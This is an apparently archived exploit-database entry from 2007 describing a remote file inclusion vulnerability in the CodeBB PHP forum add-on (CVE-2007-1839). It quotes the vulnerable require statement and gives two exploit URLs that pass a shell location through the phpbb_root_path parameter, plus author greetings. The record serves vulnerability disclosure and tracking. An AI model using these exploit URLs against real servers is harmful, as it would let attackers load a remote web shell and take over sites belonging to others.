CodeBB 1.0 Beta 2 - 'phpbb_root_path' Remote File Inclusion

Author: Alkomandoz Hacker
type: webapps
platform: php
port: 
date_added: 2007-03-27 
date_updated:  
verified: 1 
codes: OSVDB-35423;CVE-2007-1839;OSVDB-35422 
tags: 
aliases:  
screenshot_url:  
application_url: 

# codebb 1.1b3  (phpbb_root_path )Remote File Include Vulnerability

# D.Script: http://rd.cycnus.de/download/codebb-1.1b3.tar.bz2

# Discovered by: Alkomandoz Hacker

# Homepage: http://www.asb-may.net
# V.Code

# include_once($phpbb_root_path . 'includes/codebb/config.'.$phpEx);

require($phpbb_root_path . 'includes/codebb/scanners/scannerlist.'.$phpEx);



# Exploit:[Path]/codebb/pass_code.php?phpbb_root_path=SheLL

    [Path]/codebb/lang_select?phpbb_root_path=SheLL


# Greetz To: A-s-T Team & AsbMay's Group & KaBaRa & Mahmood_Ali & ThE-DE@TH & ToOoFa

# Thanx: asb-may.net & TrYaG.CoM

# milw0rm.com [2007-03-28]